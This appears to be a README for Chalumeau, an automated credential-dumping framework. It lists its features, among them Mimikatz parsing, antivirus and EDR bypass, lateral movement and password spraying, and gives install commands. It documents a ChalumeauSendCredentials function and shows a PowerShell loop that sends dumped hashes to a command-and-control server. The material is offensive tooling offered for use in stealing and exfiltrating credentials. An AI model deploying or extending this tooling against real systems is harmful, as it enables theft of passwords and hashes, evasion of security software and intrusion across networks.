Chalumeau is automated,extendable and customizable credential dumping tool based on powershell and python.
- Write your own Payloads
- In-Memory execution
- Extract Password List
- Dashboard reporting / Web Interface
- Parsing Mimikatz
- Dumping Tickets
- Parsing Mimikatz dcsync (working on fix)
- Bypassing Antivirus and EDRs , you will need to maintain your payloads
- Encrypted Communication
- Automated Lateral movement
- Automated Password Spraying
- Automated Hash Cracking
git clone https://github.com/cyberstruggle/chalumeau.git
cd chalumeau/
chmod +x install.sh
sudo ./install.sh
# Run
chmod +x start.sh
sudo ./start.sh
obfuscate your own powershell payload for dumping credentials and use chalumeau function call without any imports chalumeau will Encrypt and contact with the c2 and sending the dumped credentials. just save the file under chalumeau-power/payloads
- Using ChalumeauSendCredentials Function
- ChalumeauSendCredentials
- Secret = the dumped hash or clear text password (string)
- Username = the username of id of the dumped credential (string)
- IsClearText = 1 if it's clear text 0 if it's not (int)
- Source = mention the Source payload like "Mimikatz Hash" (string)
- ChalumeauSendCredentials
# Custom Payload Example
# $DumpedHashes is array of dumped hashes from the local machine
foreach ($hash in $DumpedHashes){
ChalumeauSendCredentials -Secret $hash.secret -Username $hash.user -IsClearText 0 -source "My custom payload"
}
- wazehell Author
- Invoke-Obfuscation Daniel Bohannon
- Invoke-Mimikatz PowerSploit
- Get-PassHashes nishang
- Chalumeau Logo Aureliano
- Invoke-MassMimikatz PowerTools